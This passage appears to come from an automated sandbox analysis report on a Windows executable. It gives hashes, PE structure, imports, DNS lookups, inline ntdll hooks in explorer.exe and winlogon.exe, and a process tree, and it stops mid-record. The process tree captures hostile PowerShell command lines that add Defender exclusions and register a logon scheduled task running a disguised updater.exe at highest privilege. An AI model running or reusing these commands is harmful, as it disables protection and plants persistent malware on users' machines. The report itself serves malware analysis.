Preview:	ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.35124337150901
Encrypted:	false
SSDEEP:	384:7h+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwH:7OqabeGTnbuSxj
MD5:	2D7BA746B746412B8DC92CB5B4BBA9FC
SHA1:	09C734B48CA58449652D0274D1E5E6E3ACE7C8F2
SHA-256:	3DB4D70EB057F3C6DF34CE4D0AB398CC975E38A9DF507826B1E26A88CF438F78
SHA-512:	43866503D232B635F8CD6DE922F05166A31A3308D9DD5164B8DD65C19BB1061F5454227518C470C0A5F1525FE8B5E2C1E2D9874FD2B8CCEC8B76BFE7B404F2EF
Malicious:	false
Preview:	ElfChnk.....................................H...x...2.k......................................................................W.}............................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.421206160086997
Encrypted:	false
SSDEEP:	384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
MD5:	67CAD90771EBC0BD20736201D89C1586
SHA1:	EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
SHA-256:	7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
SHA-512:	27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
Malicious:	false
Preview:	ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	68120
Entropy (8bit):	4.327804066902123
Encrypted:	false
SSDEEP:	384:biFRIiFRCoMonS6cWNfoLSbdsLSvnQYoxMtg6Wo9MtxLo9MtMozonuoxNo/Vo1+q:gdWa1ZGg6UfAKWZ8
MD5:	340D78EED0ECC6DD7BCFC8FE1624A946
SHA1:	31E6AE9106F0A00A0D42DB71D3331CC95C8A62A8
SHA-256:	3E9BB35C7D7A3586EDBC56F7FB8BA29F5E46E34A359FDE5814D9F4FE592B5E63
SHA-512:	34CB298210140610E0CAAB3D41AFC3F37E1295A7CC9BE88BA0D74DC4939798316142C309E27389A160521DCEFAEA5C5B37C130297B34CDCA06632B4525C25545
Malicious:	false
Preview:	ElfChnk.................U.......U....................\h......................................................................Mc....................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................................................&...................................................................................**......U.......5.b............Wt.&........Wt...wX..9Ck?5.?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	76864
Entropy (8bit):	4.379340278128919
Encrypted:	false
SSDEEP:	384:fFRc3EFRc3EAlo3iUr+hHhBYceD+AwVfMNf5nf0lRlRXRLHeJvGAgXZIpURCOLi4:d38lnLmLQXHmtpJnqiNHpzoQpvnXet
MD5:	62E6754A55794985CB88475E0CCB509E
SHA1:	709022A63C7CE2D01994F22F0CD2DD79C6DB0531
SHA-256:	EDB9546522D6C06224BB9D7E7D44C5227F230EBC5757F429F60D59D0BD80510B
SHA-512:	4DB4FA8B7E922C6B10D3D6F4FD3B550876E9862D229E2770897B0D610A5535AFBB607ECF18031B55AD5C2218DB40975B3878899198DCDC22EFAED4FCEB897F35
Malicious:	false
Preview:	ElfChnk.................m.......r...................};.t......................................................................G....................s...h...............N...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**......m.......5.b............i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	57248
Entropy (8bit):	3.8539726080902623
Encrypted:	false
SSDEEP:	1536:6Z9R4vZqxfHfI+BKheWSWzWUWP7WsJWoW+WLnCIpVe+6:s
MD5:	A378329B10461167D49006D4B13E924E
SHA1:	82964E5AF7A1B3D60AA10AA642C94E9A95290835
SHA-256:	2484C8381B929605988BC2E6FFA35A858A18846B978C85AF1A53F98F380D7482
SHA-512:	CCAC4B5C64A642786CC713FEE0F833BC935040482947F59657E4EDF3A1E7C7A2A8CE57DCAF7CA1FB775BA355402ADA306F2B390435B04D7E90F23CD5C024A894
Malicious:	false
Preview:	ElfChnk.................y...................@i..xr...a.....................................................................b/p]............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**......y......................B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.688779848966801
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	ylVAEHbMLf.exe
File size:	5'980'672 bytes
MD5:	3fb477ee2214bf2d4ed7df2d23f159e8
SHA1:	836c3f3b4b8f02e495703767b6bf923c453dba36
SHA256:	508821549db3334cccd6d492e17b29343ea5d0bda03379188c083e8c2217c291
SHA512:	e45c0e45177a3bb56b3685aa52c7107d390b9f9519edb5e2bc475dc20cfad615def0786039583255ad178b9f6d0941a0166b43da7a9c90acefb55eb6b27634e4
SSDEEP:	98304:Q/PrJHt+UOW/6U0GEkZqBq+2fxF2FZrejHPTu+8:QnrRkU0CZqBna2FZrIHid
TLSH:	4E56DFCAF163056CD11C26BF98F9AE1ACD7BE51A0811EAE8732552F2D1134DCC4689FE
File Content Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.....>[................@..............................[......Y[...`... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x1400014b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66F204D3 [Tue Sep 24 00:16:19 2024 UTC]
TLS Callbacks:	0x4000f030, 0x1, 0x4000f000, 0x1
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f7505c167603909b7180406402fef19e

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [005AFCE5h]
mov dword ptr [eax], 00000001h
call 00007F863134560Fh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [005AFCC5h]
mov dword ptr [eax], 00000000h
call 00007F86313455EFh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007F863135C6F4h
dec eax
test eax, eax
sete al
movzx eax, al
neg eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007F8631345929h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
dec eax
lea eax, dword ptr [005B4809h]
dec eax
lea edx, dword ptr [eax+21h]
mov byte ptr [eax], 00000000h
dec eax
add eax, 01h
dec eax
cmp eax, edx
jne 00007F8631345946h
ret
dec eax
lea eax, dword ptr [005B47B1h]
dec eax
lea edx, dword ptr [eax+18h]
mov word ptr [eax], 0000h
dec eax
add eax, 02h
dec eax
cmp eax, edx
jne 00007F8631345944h
ret
dec eax
lea eax, dword ptr [005B4777h]
dec eax
lea edx, dword ptr [eax+14h]
mov word ptr [eax], 0000h
dec eax
add eax, 02h
dec eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5b7000	0xa34	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5ba000	0x6b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x5b2000	0x1170	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5bb000	0x330	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5b07a0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5b728c	0x250	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x19440	0x19600	bf281938f7213b62bf17c20e58c71e9e	False	0.47222329125615764	data	6.168467606725369	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x1b000	0x592ce0	0x592e00	11b96fd93c092a1e0029d507be396df2	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x5ae000	0x3a10	0x3c00	faa3d550e264bcf38646204c1b2ad6ec	False	0.35279947916666665	OpenPGP Secret Key	5.040707085037882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x5b2000	0x1170	0x1200	a9545924f7c8d281db3593783cb2e4ef	False	0.466796875	data	5.102637887607491	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x5b4000	0xf08	0x1000	12c0437a9eef7054b705eb0af90a1d04	False	0.243896484375	data	4.029627623925964	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x5b5000	0x1c40	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5b7000	0xa34	0xc00	bc194b5beaec5996a339d475fc5318c4	False	0.3030598958333333	data	3.813179986422126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x5b8000	0x60	0x200	808e8e5762727cbde45d2a0e66d5c313	False	0.06640625	data	0.26234430731160896	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x5b9000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5ba000	0x6b8	0x800	8ea36ad049e1f1d71fd364cf117e1333	False	0.38818359375	data	4.2150416021001895	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x5bb000	0x330	0x400	3f6681f0f5a661ed3b45235b695a74e6	False	0.5712890625	data	4.765082104358313	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x5ba0a0	0x2f0	SysEx File - IDP	English	United States	0.449468085106383
RT_MANIFEST	0x5ba390	0x325	XML 1.0 document, ASCII text	English	United States	0.506832298136646

Imports

DLL

Import

KERNEL32.dll

CloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSemaphore, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte

msvcrt.dll

__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, fputc, fputs, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 00:27:05.900607109 CEST	1.1.1.1	192.168.2.4	0xb41f	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 00:27:05.900607109 CEST	1.1.1.1	192.168.2.4	0xb41f	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 8, 2024 00:27:18.337925911 CEST	1.1.1.1	192.168.2.4	0x9195	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 00:27:18.337925911 CEST	1.1.1.1	192.168.2.4	0x9195	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	18:26:47
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\ylVAEHbMLf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ylVAEHbMLf.exe"
Imagebase:	0x7ff6a0400000
File size:	5'980'672 bytes
MD5 hash:	3FB477EE2214BF2D4ED7DF2D23F159E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:26:47
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:26:47
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:26:51
Start date:	07/10/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff609870000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:26:51
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:26:51
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:26:51
Start date:	07/10/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff7cd660000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	18:26:52
Start date:	07/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff7a2ae0000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	18:26:53
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	18:26:53
Start date:	07/10/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff74e710000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	18:26:56
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	18:26:56
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	18:26:56
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	18:26:57
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	18:26:57
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff6eef20000
